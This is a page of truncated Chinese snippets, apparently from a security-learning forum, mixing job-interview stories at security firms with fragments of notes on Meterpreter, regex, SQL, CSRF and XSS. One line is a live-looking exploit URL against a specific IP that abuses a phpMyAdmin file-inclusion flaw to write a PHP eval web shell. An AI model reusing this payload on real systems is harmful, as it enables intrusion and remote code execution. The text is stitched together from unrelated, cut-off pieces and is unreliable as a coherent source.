所面试的公司：北京华顺信安（白帽汇）薪资待遇：保密。不过给到满意了，因为是一线城市，也不会牵涉二三线转一线不加薪的忧虑。而且hr和主管都蛮好的，嘿嘿。所在城市：北京面试职位：安全服务工程师面试过程：电话面试。总共经历了三次面试。还有两三次人力资源的沟通。面试官的问题：自我介绍 巴拉巴拉~红蓝队经验 巴拉巴拉~ 红队的话主要就是地市级别的多一些，以抢时间为主，一般都是三个人，一般按照1

之前面试了很久，后来拿到软通动力和安恒的offer，软通那边流程都走完了，就差入职了，最后选择去了安恒，挺不好意思的。然后说一下，南京软通动力那边有个车联网自动驾驶项目web安全测试，目前急需人，大家感兴趣了可以看下，技术要求的话，其实不高的，用我给的文档完全可以。HR邢奔燕人挺好的，一面二面综面也都蛮简单的。HR也说了薪资可以放宽，感兴趣的可以大胆面。南京安恒这边安服也是缺人的，大家也可以来看看

面试流程70大大已经说了大部分问题不关技术的都会是自我介绍、离职原因、薪资期望（先反问薪资结构）、入职时间。这些注意好措辞就好了，我就不给我怎么说的了。毕竟离职都没能拔到70大大的腿毛，也没能抱着风哥的大腿，搂着周末的胳膊，然后对思学老师含情脉脉，是我的遗憾。技术面的话，主要就是两种了，渗透测试和安全服务。话不多说，逸辰这孩子，是真的倒霉，我就不吐槽了。安全服务的问题，直接看我附件就行了。渗透

http://117.167.136.245:21880/lfi/phpmyadmin/index.php?target=db_sql.php%253f/../../../../mysql/data/yichen/minyu.frm&a=$a='<?php @eval($_REQUEST[\'a\'])?>';file_put_contents(

一次简单的Meterpreter测试一、 正向控制：1）被控端（被攻击者）执行了控制软件打开远程控制服务端           2）主控端（攻击者）需知道被控端IP反向控制：受害人执行了控制软件被控制之后会主动告诉控制端自己已被控制（即主控方不需要知道对方IP）二、 使用Kali Linux 2作为主控端（192.168.157.128）

正则表达式 常用转义字符：数字：\d非数字：\D空白字符（空格、制表符、换页符等）：\s非空白字符：\S制表符：\t回车符：\r换行符：\n单词字符（26个英文字母+数字+下划线_）：\w非单词字符：\W /zkaq.*key.{2,9}:\/.*\/(key*key)/i/xx/ 表示双斜杠里面填的是正则表达式I 表示是忽略大小写. 表示匹配除了\n换行符以外的任意的一个字符

login.html<!DOCTYPE html><html><head><title>表单验证</title></head><body><form action="login.php" method="post"/> 账号：<input type

 数据库简介及SQL语法数据库就是将大量数据把保存起来，通过计算机加工而成的可以高效访问的数据集合。常见的数据库：     ①Oracle Database：甲骨文公司　　　　②SQL Server：微软公司　　　　③DB2：IBM 公司　　　　④PostgreSQL：开源　　　　⑤MySQL：开源3 种 SQL 语句种类：　　　　（1）DDL（数据定义语言

9.4、CSRF跨站伪造请求CSRF（Cross-site request forgery）跨站请求伪造：也被称为“One Click Attack”或者Session Riding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用。尽管听起来像跨站脚本（XSS），但它与XSS非常不同，XSS利用站点内的信任用户，而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相

1.XSS主要拼接的是什么？       （总结：xss就是拼接恶意的HTML）SQL注入拼接的是操作数据库的SQL语句。XSS拼接的是网页的HTML代码，一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句2.xss真的执行恶意代码的实际上是JS语句，那么我们一般需要构建<script></script&gt